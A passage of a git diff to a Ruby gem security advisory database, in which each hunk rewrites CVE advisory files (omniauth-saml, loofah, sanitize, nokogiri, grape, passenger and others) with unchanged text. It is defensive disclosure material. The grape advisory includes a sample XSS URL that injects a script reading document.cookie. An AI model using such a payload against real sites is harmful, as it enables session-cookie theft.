-  url: https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
-  title: omniauth-saml authentication bypass via incorrect XML canonicalization and
-    DOM traversal
-  date: 2018-02-27
-  description: |
-    OmniAuth OmnitAuth-SAML 1.9.0 and earlier may incorrectly utilize the
-    results of XML DOM traversal and canonicalization APIs in such a way that an attacker
-    may be able to manipulate the SAML data without invalidating the cryptographic signature,
-    allowing the attack to potentially bypass authentication to SAML service providers.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.10.0"
----
+---
+layout: advisory
+title: 'CVE-2017-11430 (omniauth-saml): omniauth-saml authentication bypass via incorrect
+  XML canonicalization and DOM traversal'
+comments: false
+categories:
+- omniauth-saml
+advisory:
+  gem: omniauth-saml
+  cve: 2017-11430
+  ghsa: 94hm-8q65-rmxm
+  url: https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
+  title: omniauth-saml authentication bypass via incorrect XML canonicalization and
+    DOM traversal
+  date: 2018-02-27
+  description: |
+    OmniAuth OmnitAuth-SAML 1.9.0 and earlier may incorrectly utilize the
+    results of XML DOM traversal and canonicalization APIs in such a way that an attacker
+    may be able to manipulate the SAML data without invalidating the cryptographic signature,
+    allowing the attack to potentially bypass authentication to SAML service providers.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.10.0"
+---
diff --git a/advisories/_posts/2018-03-07-CVE-2018-1000119.md b/advisories/_posts/2018-03-07-CVE-2018-1000119.md
index c19c8d59..bc937db8 100644
--- a/advisories/_posts/2018-03-07-CVE-2018-1000119.md
+++ b/advisories/_posts/2018-03-07-CVE-2018-1000119.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2018-1000119 (rack-protection): rack-protection gem timing attack vulnerability
-  when validating CSRF token'
-comments: false
-categories:
-- rack-protection
-advisory:
-  gem: rack-protection
-  cve: 2018-1000119
-  ghsa: 688c-3x49-6rqj
-  url: https://github.com/sinatra/rack-protection/pull/98
-  title: rack-protection gem timing attack vulnerability when validating CSRF token
-  date: 2018-03-07
-  description: |
-    Sinatra rack-protection versions 1.5.4 and 2.0.0.rc3 and earlier contains
-    a timing attack vulnerability in the CSRF token checking that can result in signatures
-    can be exposed. This attack appear to be exploitable via network connectivity to
-    the ruby application.
-  cvss_v2: 4.3
-  cvss_v3: 5.9
-  patched_versions:
-  - "~> 1.5.5"
-  - ">= 2.0.0"
----
+---
+layout: advisory
+title: 'CVE-2018-1000119 (rack-protection): rack-protection gem timing attack vulnerability
+  when validating CSRF token'
+comments: false
+categories:
+- rack-protection
+advisory:
+  gem: rack-protection
+  cve: 2018-1000119
+  ghsa: 688c-3x49-6rqj
+  url: https://github.com/sinatra/rack-protection/pull/98
+  title: rack-protection gem timing attack vulnerability when validating CSRF token
+  date: 2018-03-07
+  description: |
+    Sinatra rack-protection versions 1.5.4 and 2.0.0.rc3 and earlier contains
+    a timing attack vulnerability in the CSRF token checking that can result in signatures
+    can be exposed. This attack appear to be exploitable via network connectivity to
+    the ruby application.
+  cvss_v2: 4.3
+  cvss_v3: 5.9
+  patched_versions:
+  - "~> 1.5.5"
+  - ">= 2.0.0"
+---
diff --git a/advisories/_posts/2018-03-16-CVE-2018-8048.md b/advisories/_posts/2018-03-16-CVE-2018-8048.md
index f6ddebcc..a214fa9a 100644
--- a/advisories/_posts/2018-03-16-CVE-2018-8048.md
+++ b/advisories/_posts/2018-03-16-CVE-2018-8048.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2018-8048 (loofah): Loofah XSS Vulnerability'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  cve: 2018-8048
-  ghsa: x7rv-cr6v-4vm4
-  url: https://github.com/flavorjones/loofah/issues/144
-  title: Loofah XSS Vulnerability
-  date: 2018-03-16
-  description: |
-    Loofah allows non-whitelisted attributes to be present in sanitized
-    output when input with specially-crafted HTML fragments.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 2.2.1"
----
+---
+layout: advisory
+title: 'CVE-2018-8048 (loofah): Loofah XSS Vulnerability'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  cve: 2018-8048
+  ghsa: x7rv-cr6v-4vm4
+  url: https://github.com/flavorjones/loofah/issues/144
+  title: Loofah XSS Vulnerability
+  date: 2018-03-16
+  description: |
+    Loofah allows non-whitelisted attributes to be present in sanitized
+    output when input with specially-crafted HTML fragments.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 2.2.1"
+---
diff --git a/advisories/_posts/2018-03-19-CVE-2018-3740.md b/advisories/_posts/2018-03-19-CVE-2018-3740.md
index 07591c69..e4364eea 100644
--- a/advisories/_posts/2018-03-19-CVE-2018-3740.md
+++ b/advisories/_posts/2018-03-19-CVE-2018-3740.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2018-3740 (sanitize): HTML injection/XSS in Sanitize'
-comments: false
-categories:
-- sanitize
-advisory:
-  gem: sanitize
-  cve: 2018-3740
-  ghsa: 7f42-p84j-f58p
-  url: https://github.com/rgrove/sanitize/issues/176
-  title: HTML injection/XSS in Sanitize
-  date: 2018-03-19
-  description: |
-    When Sanitize gem is used in combination with libxml2 >= 2.9.2,
-    a specially crafted HTML fragment can cause libxml2 to generate
-    improperly escaped output, allowing non-whitelisted attributes to be
-    used on whitelisted elements.
-
-    This can allow HTML and JavaScript injection, which could result in XSS
-    if Sanitize's output is served to browsers.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 1.1.0"
-  patched_versions:
-  - "~> 2.1.1"
-  - ">= 4.6.3"
-  related:
-    url:
-    - https://github.com/rgrove/sanitize/commit/01629a162e448a83d901456d0ba8b65f3b03d46e
----
+---
+layout: advisory
+title: 'CVE-2018-3740 (sanitize): HTML injection/XSS in Sanitize'
+comments: false
+categories:
+- sanitize
+advisory:
+  gem: sanitize
+  cve: 2018-3740
+  ghsa: 7f42-p84j-f58p
+  url: https://github.com/rgrove/sanitize/issues/176
+  title: HTML injection/XSS in Sanitize
+  date: 2018-03-19
+  description: |
+    When Sanitize gem is used in combination with libxml2 >= 2.9.2,
+    a specially crafted HTML fragment can cause libxml2 to generate
+    improperly escaped output, allowing non-whitelisted attributes to be
+    used on whitelisted elements.
+
+    This can allow HTML and JavaScript injection, which could result in XSS
+    if Sanitize's output is served to browsers.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 1.1.0"
+  patched_versions:
+  - "~> 2.1.1"
+  - ">= 4.6.3"
+  related:
+    url:
+    - https://github.com/rgrove/sanitize/commit/01629a162e448a83d901456d0ba8b65f3b03d46e
+---
diff --git a/advisories/_posts/2018-03-22-CVE-2018-3741.md b/advisories/_posts/2018-03-22-CVE-2018-3741.md
index bd36967a..92279c90 100644
--- a/advisories/_posts/2018-03-22-CVE-2018-3741.md
+++ b/advisories/_posts/2018-03-22-CVE-2018-3741.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2018-3741 (rails-html-sanitizer): XSS vulnerability in rails-html-sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2018-3741
-  ghsa: px3r-jm9g-c8w8
-  url: https://groups.google.com/d/msg/rubyonrails-security/tP7W3kLc5u4/uDy2Br7xBgAJ
-  title: XSS vulnerability in rails-html-sanitizer
-  date: 2018-03-22
-  description: |
-    There is a possible XSS vulnerability in rails-html-sanitizer.  The gem allows
-    non-whitelisted attributes to be present in sanitized output when input with
-    specially-crafted HTML fragments, and these attributes can lead to an XSS attack
-    on target applications.
-
-    This issue is similar to CVE-2018-8048 in Loofah.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.0.4"
-  related:
-    cve:
-    - 2018-8048
-    url:
-    - https://github.com/rails/rails-html-sanitizer/commit/f3ba1a839a35f2ba7f941c15e239a1cb379d56ae
----
+---
+layout: advisory
+title: 'CVE-2018-3741 (rails-html-sanitizer): XSS vulnerability in rails-html-sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2018-3741
+  ghsa: px3r-jm9g-c8w8
+  url: https://groups.google.com/d/msg/rubyonrails-security/tP7W3kLc5u4/uDy2Br7xBgAJ
+  title: XSS vulnerability in rails-html-sanitizer
+  date: 2018-03-22
+  description: |
+    There is a possible XSS vulnerability in rails-html-sanitizer.  The gem allows
+    non-whitelisted attributes to be present in sanitized output when input with
+    specially-crafted HTML fragments, and these attributes can lead to an XSS attack
+    on target applications.
+
+    This issue is similar to CVE-2018-8048 in Loofah.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.0.4"
+  related:
+    cve:
+    - 2018-8048
+    url:
+    - https://github.com/rails/rails-html-sanitizer/commit/f3ba1a839a35f2ba7f941c15e239a1cb379d56ae
+---
diff --git a/advisories/_posts/2018-03-29-CVE-2018-8048.md b/advisories/_posts/2018-03-29-CVE-2018-8048.md
index 4df63a99..3060218b 100644
--- a/advisories/_posts/2018-03-29-CVE-2018-8048.md
+++ b/advisories/_posts/2018-03-29-CVE-2018-8048.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2018-8048 (nokogiri): Revert libxml2 behavior in Nokogiri gem that could
-  cause XSS'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2018-8048
-  ghsa: x7rv-cr6v-4vm4
-  url: https://github.com/sparklemotion/nokogiri/pull/1746
-  title: Revert libxml2 behavior in Nokogiri gem that could cause XSS
-  date: 2018-03-29
-  description: |
-    [MRI] Behavior in libxml2 has been reverted which caused
-    CVE-2018-8048 (loofah gem), CVE-2018-3740 (sanitize gem), and
-    CVE-2018-3741 (rails-html-sanitizer gem). The commit in question is
-    here:
-
-    https://github.com/GNOME/libxml2/commit/960f0e2
-
-    and more information is available about this commit and its impact
-    here:
-
-    https://github.com/flavorjones/loofah/issues/144
-
-    This release simply reverts the libxml2 commit in question to protect
-    users of Nokogiri's vendored libraries from similar vulnerabilities.
-
-    If you're offended by what happened here, I'd kindly ask that you
-    comment on the upstream bug report here:
-
-    https://bugzilla.gnome.org/show_bug.cgi?id=769760
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.8.3"
-  related:
-    cve:
-    - 2018-3740
-    - 2018-3741
-    url:
-    - https://github.com/GNOME/libxml2/commit/960f0e2
-    - https://bugzilla.gnome.org/show_bug.cgi?id=769760
----
+---
+layout: advisory
+title: 'CVE-2018-8048 (nokogiri): Revert libxml2 behavior in Nokogiri gem that could
+  cause XSS'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2018-8048
+  ghsa: x7rv-cr6v-4vm4
+  url: https://github.com/sparklemotion/nokogiri/pull/1746
+  title: Revert libxml2 behavior in Nokogiri gem that could cause XSS
+  date: 2018-03-29
+  description: |
+    [MRI] Behavior in libxml2 has been reverted which caused
+    CVE-2018-8048 (loofah gem), CVE-2018-3740 (sanitize gem), and
+    CVE-2018-3741 (rails-html-sanitizer gem). The commit in question is
+    here:
+
+    https://github.com/GNOME/libxml2/commit/960f0e2
+
+    and more information is available about this commit and its impact
+    here:
+
+    https://github.com/flavorjones/loofah/issues/144
+
+    This release simply reverts the libxml2 commit in question to protect
+    users of Nokogiri's vendored libraries from similar vulnerabilities.
+
+    If you're offended by what happened here, I'd kindly ask that you
+    comment on the upstream bug report here:
+
+    https://bugzilla.gnome.org/show_bug.cgi?id=769760
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.8.3"
+  related:
+    cve:
+    - 2018-3740
+    - 2018-3741
+    url:
+    - https://github.com/GNOME/libxml2/commit/960f0e2
+    - https://bugzilla.gnome.org/show_bug.cgi?id=769760
+---
diff --git a/advisories/_posts/2018-04-13-CVE-2017-18258.md b/advisories/_posts/2018-04-13-CVE-2017-18258.md
index 6d02e071..feb21c0b 100644
--- a/advisories/_posts/2018-04-13-CVE-2017-18258.md
+++ b/advisories/_posts/2018-04-13-CVE-2017-18258.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2017-18258 (nokogiri): Moderate severity vulnerability that affects nokogiri'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2017-18258
-  ghsa: 882p-jqgm-f45g
-  url: https://git.gnome.org/browse/libxml2/commit/?id=e2a9122b8dde53d320750451e9907a7dcb2ca8bb
-  title: Moderate severity vulnerability that affects nokogiri
-  date: 2018-04-13
-  description: |
-    The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial
-    of service (memory consumption) via a crafted LZMA file, because the decoder functionality does
-    not restrict memory usage to what is required for a legitimate file.
-
-    References:
-      - https://nvd.nist.gov/vuln/detail/CVE-2017-18258
-      - https://git.gnome.org/browse/libxml2/commit/?id=e2a9122b8dde53d320750451e9907a7dcb2ca8bb
-      - https://github.com/advisories/GHSA-882p-jqgm-f45g
-      - https://kc.mcafee.com/corporate/index?page=content&id=SB10284
-      - https://lists.debian.org/debian-lts-announce/2018/09/msg00035.html
-      - https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html
-      - https://security.netapp.com/advisory/ntap-20190719-0001/
-      - https://usn.ubuntu.com/3739-1/
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 1.8.2"
----
+---
+layout: advisory
+title: 'CVE-2017-18258 (nokogiri): Moderate severity vulnerability that affects nokogiri'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2017-18258
+  ghsa: 882p-jqgm-f45g
+  url: https://git.gnome.org/browse/libxml2/commit/?id=e2a9122b8dde53d320750451e9907a7dcb2ca8bb
+  title: Moderate severity vulnerability that affects nokogiri
+  date: 2018-04-13
+  description: |
+    The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial
+    of service (memory consumption) via a crafted LZMA file, because the decoder functionality does
+    not restrict memory usage to what is required for a legitimate file.
+
+    References:
+      - https://nvd.nist.gov/vuln/detail/CVE-2017-18258
+      - https://git.gnome.org/browse/libxml2/commit/?id=e2a9122b8dde53d320750451e9907a7dcb2ca8bb
+      - https://github.com/advisories/GHSA-882p-jqgm-f45g
+      - https://kc.mcafee.com/corporate/index?page=content&id=SB10284
+      - https://lists.debian.org/debian-lts-announce/2018/09/msg00035.html
+      - https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html
+      - https://security.netapp.com/advisory/ntap-20190719-0001/
+      - https://usn.ubuntu.com/3739-1/
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 1.8.2"
+---
diff --git a/advisories/_posts/2018-04-23-CVE-2019-3881.md b/advisories/_posts/2018-04-23-CVE-2019-3881.md
index 0afee844..1b4b1a0a 100644
--- a/advisories/_posts/2018-04-23-CVE-2019-3881.md
+++ b/advisories/_posts/2018-04-23-CVE-2019-3881.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2019-3881 (bundler): Insecure path handling in Bundler'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  cve: 2019-3881
-  ghsa: g98m-96g9-wfjq
-  url: https://github.com/advisories/GHSA-g98m-96g9-wfjq
-  date: 2018-04-23
-  title: Insecure path handling in Bundler
-  description: |
-    Bundler prior to 2.1.0 uses a predictable path in /tmp/, created with
-    insecure permissions as a storage location for gems, if locations under the user's
-    home directory are not available. If Bundler is used in a scenario where the user
-    does not have a writable home directory, an attacker could place malicious code
-    in this directory that would be later loaded and executed.
-  cvss_v3: 7.0
-  patched_versions:
-  - ">= 2.1.0"
-  unaffected_versions:
-  - "< 1.14.0"
----
+---
+layout: advisory
+title: 'CVE-2019-3881 (bundler): Insecure path handling in Bundler'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  cve: 2019-3881
+  ghsa: g98m-96g9-wfjq
+  url: https://github.com/advisories/GHSA-g98m-96g9-wfjq
+  date: 2018-04-23
+  title: Insecure path handling in Bundler
+  description: |
+    Bundler prior to 2.1.0 uses a predictable path in /tmp/, created with
+    insecure permissions as a storage location for gems, if locations under the user's
+    home directory are not available. If Bundler is used in a scenario where the user
+    does not have a writable home directory, an attacker could place malicious code
+    in this directory that would be later loaded and executed.
+  cvss_v3: 7.0
+  patched_versions:
+  - ">= 2.1.0"
+  unaffected_versions:
+  - "< 1.14.0"
+---
diff --git a/advisories/_posts/2018-04-30-CVE-2018-1000539.md b/advisories/_posts/2018-04-30-CVE-2018-1000539.md
index 2963786c..be12f95a 100644
--- a/advisories/_posts/2018-04-30-CVE-2018-1000539.md
+++ b/advisories/_posts/2018-04-30-CVE-2018-1000539.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2018-1000539 (json-jwt): Auth tag forgery vulnerability with AES-GCM encrypted
-  JWT'
-comments: false
-categories:
-- json-jwt
-advisory:
-  gem: json-jwt
-  cve: 2018-1000539
-  ghsa: mj4x-wcxf-hm8x
-  url: https://github.com/nov/json-jwt/pull/62
-  title: Auth tag forgery vulnerability with AES-GCM encrypted JWT
-  date: 2018-04-30
-  description: |
-    Ruby's OpenSSL bindings do not check the length of the supplied
-    authentication tag when decrypting an authenticated encryption mode
-    such as AES-GCM, leaving this up to the authors of a gem/app to
-    implement for properly validating the message.
-
-    json-jwt was not checking for the authentication tag length, meaning
-    that with a one byte tag the JWT would be considered not tampered
-    with. This means that with an average of 128 (max 256) attempts an
-    attacker can forge a valid signature.
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 0.5.1"
-  patched_versions:
-  - ">= 1.9.4"
----
+---
+layout: advisory
+title: 'CVE-2018-1000539 (json-jwt): Auth tag forgery vulnerability with AES-GCM encrypted
+  JWT'
+comments: false
+categories:
+- json-jwt
+advisory:
+  gem: json-jwt
+  cve: 2018-1000539
+  ghsa: mj4x-wcxf-hm8x
+  url: https://github.com/nov/json-jwt/pull/62
+  title: Auth tag forgery vulnerability with AES-GCM encrypted JWT
+  date: 2018-04-30
+  description: |
+    Ruby's OpenSSL bindings do not check the length of the supplied
+    authentication tag when decrypting an authenticated encryption mode
+    such as AES-GCM, leaving this up to the authors of a gem/app to
+    implement for properly validating the message.
+
+    json-jwt was not checking for the authentication tag length, meaning
+    that with a one byte tag the JWT would be considered not tampered
+    with. This means that with an average of 128 (max 256) attempts an
+    attacker can forge a valid signature.
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 0.5.1"
+  patched_versions:
+  - ">= 1.9.4"
+---
diff --git a/advisories/_posts/2018-05-03-CVE-2018-3759.md b/advisories/_posts/2018-05-03-CVE-2018-3759.md
index 1ce10f1a..967e200d 100644
--- a/advisories/_posts/2018-05-03-CVE-2018-3759.md
+++ b/advisories/_posts/2018-05-03-CVE-2018-3759.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2018-3759 (private_address_check): private_address_check Ruby Gem Time-of-check
-  Time-of-use race condition'
-comments: false
-categories:
-- private_address_check
-advisory:
-  gem: private_address_check
-  cve: 2018-3759
-  ghsa: 2xvj-j3qh-x8c3
-  url: https://github.com/jtdowney/private_address_check/commit/4068228187db87fea7577f7020099399772bb147
-  title: private_address_check Ruby Gem Time-of-check Time-of-use race condition
-  date: 2018-05-03
-  description: |
-    private_address_check ruby gem before 0.5.0 is vulnerable to a time-of-check time-of-use (TOCTOU)
-    race condition due to the address the socket uses not being checked. DNS entries with a TTL of 0
-    can trigger this case where the initial resolution is a public address by the subsequent
-    resolution is a private address.
-  patched_versions:
-  - ">= 0.5.0"
----
+---
+layout: advisory
+title: 'CVE-2018-3759 (private_address_check): private_address_check Ruby Gem Time-of-check
+  Time-of-use race condition'
+comments: false
+categories:
+- private_address_check
+advisory:
+  gem: private_address_check
+  cve: 2018-3759
+  ghsa: 2xvj-j3qh-x8c3
+  url: https://github.com/jtdowney/private_address_check/commit/4068228187db87fea7577f7020099399772bb147
+  title: private_address_check Ruby Gem Time-of-check Time-of-use race condition
+  date: 2018-05-03
+  description: |
+    private_address_check ruby gem before 0.5.0 is vulnerable to a time-of-check time-of-use (TOCTOU)
+    race condition due to the address the socket uses not being checked. DNS entries with a TTL of 0
+    can trigger this case where the initial resolution is a public address by the subsequent
+    resolution is a private address.
+  patched_versions:
+  - ">= 0.5.0"
+---
diff --git a/advisories/_posts/2018-05-23-CVE-2018-3769.md b/advisories/_posts/2018-05-23-CVE-2018-3769.md
index 5ee46117..443bf1cf 100644
--- a/advisories/_posts/2018-05-23-CVE-2018-3769.md
+++ b/advisories/_posts/2018-05-23-CVE-2018-3769.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2018-3769 (grape): ruby-grape Gem has XSS via "format" parameter'
-comments: false
-categories:
-- grape
-advisory:
-  gem: grape
-  cve: 2018-3769
-  ghsa: f599-5m7p-hcpf
-  url: https://github.com/ruby-grape/grape/issues/1762
-  title: ruby-grape Gem has XSS via "format" parameter
-  date: 2018-05-23
-  description: |
-    When request on API contains the "format" parameter in GET, the input
-    value of this parameter is rendered as the web-server responds with
-    text/html header.
-
-    Example:
-    http://example.com/api/endpoint?format=%3Cscript%3Ealert(document.cookie)%3C/script%3E
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.1.0"
-  related:
-    url:
-    - https://github.com/ruby-grape/grape/pull/1763
-    - https://github.com/ruby-grape/grape/commit/6876b71efc7b03f7ce1be3f075eaa4e7e6de19af
----
+---
+layout: advisory
+title: 'CVE-2018-3769 (grape): ruby-grape Gem has XSS via "format" parameter'
+comments: false
+categories:
+- grape
+advisory:
+  gem: grape
+  cve: 2018-3769
+  ghsa: f599-5m7p-hcpf
+  url: https://github.com/ruby-grape/grape/issues/1762
+  title: ruby-grape Gem has XSS via "format" parameter
+  date: 2018-05-23
+  description: |
+    When request on API contains the "format" parameter in GET, the input
+    value of this parameter is rendered as the web-server responds with
+    text/html header.
+
+    Example:
+    http://example.com/api/endpoint?format=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.1.0"
+  related:
+    url:
+    - https://github.com/ruby-grape/grape/pull/1763
+    - https://github.com/ruby-grape/grape/commit/6876b71efc7b03f7ce1be3f075eaa4e7e6de19af
+---
diff --git a/advisories/_posts/2018-05-31-CVE-2018-11627.md b/advisories/_posts/2018-05-31-CVE-2018-11627.md
index fbddb16f..770bfed8 100644
--- a/advisories/_posts/2018-05-31-CVE-2018-11627.md
+++ b/advisories/_posts/2018-05-31-CVE-2018-11627.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2018-11627 (sinatra): XSS via the 400 Bad Request page'
-comments: false
-categories:
-- sinatra
-advisory:
-  gem: sinatra
-  cve: 2018-11627
-  ghsa: mq35-wqvf-r23c
-  url: https://github.com/sinatra/sinatra/issues/1428
-  title: XSS via the 400 Bad Request page
-  date: 2018-05-31
-  description: |
-    Sinatra before 2.0.2 has XSS via the 400 Bad Request page that occurs
-    upon a params parser exception.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 2.0.0.beta1"
-  - "= 2.0.0-alpha"
-  patched_versions:
-  - ">= 2.0.2"
----
+---
+layout: advisory
+title: 'CVE-2018-11627 (sinatra): XSS via the 400 Bad Request page'
+comments: false
+categories:
+- sinatra
+advisory:
+  gem: sinatra
+  cve: 2018-11627
+  ghsa: mq35-wqvf-r23c
+  url: https://github.com/sinatra/sinatra/issues/1428
+  title: XSS via the 400 Bad Request page
+  date: 2018-05-31
+  description: |
+    Sinatra before 2.0.2 has XSS via the 400 Bad Request page that occurs
+    upon a params parser exception.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 2.0.0.beta1"
+  - "= 2.0.0-alpha"
+  patched_versions:
+  - ">= 2.0.2"
+---
diff --git a/advisories/_posts/2018-06-12-CVE-2018-12026.md b/advisories/_posts/2018-06-12-CVE-2018-12026.md
index aa6a5027..954dbfc7 100644
--- a/advisories/_posts/2018-06-12-CVE-2018-12026.md
+++ b/advisories/_posts/2018-06-12-CVE-2018-12026.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2018-12026 (passenger): SpawningKit exploits'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2018-12026
-  ghsa: 7cv3-gvmc-8mq5
-  url: https://blog.phusion.nl/2018/06/12/passenger-5-3-2-various-security-fixes/
-  title: SpawningKit exploits
-  date: 2018-06-12
-  description: |
-    During the spawning of a malicious Passenger-managed application, SpawningKit
-    in Phusion Passenger 5.3.x before 5.3.2 allows such applications to replace
-    key files or directories in the spawning communication directory with
-    symlinks. This then could result in arbitrary reads and writes, which in turn
-    can result in information disclosure and privilege escalation.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 5.3.0"
-  patched_versions:
-  - ">= 5.3.2"
-  related:
-    cve:
-    - 2018-12027
-    - 2018-12028
----
+---
+layout: advisory
+title: 'CVE-2018-12026 (passenger): SpawningKit exploits'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2018-12026
+  ghsa: 7cv3-gvmc-8mq5
+  url: https://blog.phusion.nl/2018/06/12/passenger-5-3-2-various-security-fixes/
+  title: SpawningKit exploits
+  date: 2018-06-12
+  description: |
+    During the spawning of a malicious Passenger-managed application, SpawningKit
+    in Phusion Passenger 5.3.x before 5.3.2 allows such applications to replace
+    key files or directories in the spawning communication directory with
+    symlinks. This then could result in arbitrary reads and writes, which in turn
+    can result in information disclosure and privilege escalation.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 5.3.0"
+  patched_versions:
+  - ">= 5.3.2"
+  related:
+    cve:
+    - 2018-12027
+    - 2018-12028
+---
diff --git a/advisories/_posts/2018-06-12-CVE-2018-12027.md b/advisories/_posts/2018-06-12-CVE-2018-12027.md
index 5b444dfb..fd27e23e 100644
--- a/advisories/_posts/2018-06-12-CVE-2018-12027.md
+++ b/advisories/_posts/2018-06-12-CVE-2018-12027.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2018-12027 (passenger): Insecure Permissions in Phusion Passenger'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2018-12027
-  ghsa: whfx-877c-5p28
-  url: https://blog.phusion.nl/passenger-5-3-2
-  title: Insecure Permissions in Phusion Passenger
-  date: 2018-06-12
-  description: |
-    "An Insecure Permissions vulnerability in SpawningKit in Phusion Passenger
-    5.3.x before 5.3.2 causes information disclosure in the following situation: given
-    a Passenger-spawned application process that reports that it listens on a certain
-    Unix domain socket, if any of the parent directories of said socket are writable
-    by a normal user that is not the application''s user, then that non-application
-    user can swap that directory with something else, resulting in traffic being redirected
-    to a non-application user''s process through an alternative Unix domain socket."
-  cvss_v2: 6.5
-  cvss_v3: 8.8
-  unaffected_versions:
-  - "< 5.3.0"
-  patched_versions:
-  - ">= 5.3.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-12027
-    - https://blog.phusion.nl/passenger-5-3-2
-    - https://security.gentoo.org/glsa/201807-02
-    - https://github.com/advisories/GHSA-whfx-877c-5p28
----
+---
+layout: advisory
+title: 'CVE-2018-12027 (passenger): Insecure Permissions in Phusion Passenger'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2018-12027
+  ghsa: whfx-877c-5p28
+  url: https://blog.phusion.nl/passenger-5-3-2
+  title: Insecure Permissions in Phusion Passenger
+  date: 2018-06-12
+  description: |
+    "An Insecure Permissions vulnerability in SpawningKit in Phusion Passenger
+    5.3.x before 5.3.2 causes information disclosure in the following situation: given
+    a Passenger-spawned application process that reports that it listens on a certain
+    Unix domain socket, if any of the parent directories of said socket are writable
+    by a normal user that is not the application''s user, then that non-application
+    user can swap that directory with something else, resulting in traffic being redirected
+    to a non-application user''s process through an alternative Unix domain socket."
+  cvss_v2: 6.5
+  cvss_v3: 8.8
+  unaffected_versions:
+  - "< 5.3.0"
+  patched_versions:
+  - ">= 5.3.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12027
+    - https://blog.phusion.nl/passenger-5-3-2
+    - https://security.gentoo.org/glsa/201807-02
+    - https://github.com/advisories/GHSA-whfx-877c-5p28
+---
diff --git a/advisories/_posts/2018-06-12-CVE-2018-12028.md b/advisories/_posts/2018-06-12-CVE-2018-12028.md
index 8279d0d9..6ab14a83 100644
--- a/advisories/_posts/2018-06-12-CVE-2018-12028.md
+++ b/advisories/_posts/2018-06-12-CVE-2018-12028.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2018-12028 (passenger): Incorrect Access Control in Phusion Passenger'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2018-12028
-  ghsa: jjhj-8gx7-x836
-  url: https://blog.phusion.nl/passenger-5-3-2
-  title: Incorrect Access Control in Phusion Passenger
-  date: 2018-06-12
-  description: |
-    An Incorrect Access Control vulnerability in SpawningKit in Phusion Passenger
-    5.3.x before 5.3.2 allows a Passenger-managed malicious application, upon spawning
-    a child process, to report an arbitrary different PID back to Passenger's process
-    manager. If the malicious application then generates an error, it would cause Passenger's
-    process manager to kill said reported arbitrary PID.
-  cvss_v2: 6.8
-  cvss_v3: 7.8
-  unaffected_versions:
-  - "< 5.3.0"
-  patched_versions:
-  - ">= 5.3.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-12028
-    - https://blog.phusion.nl/passenger-5-3-2
-    - https://security.gentoo.org/glsa/201807-02
-    - https://github.com/advisories/GHSA-jjhj-8gx7-x836
----
+---
+layout: advisory
+title: 'CVE-2018-12028 (passenger): Incorrect Access Control in Phusion Passenger'
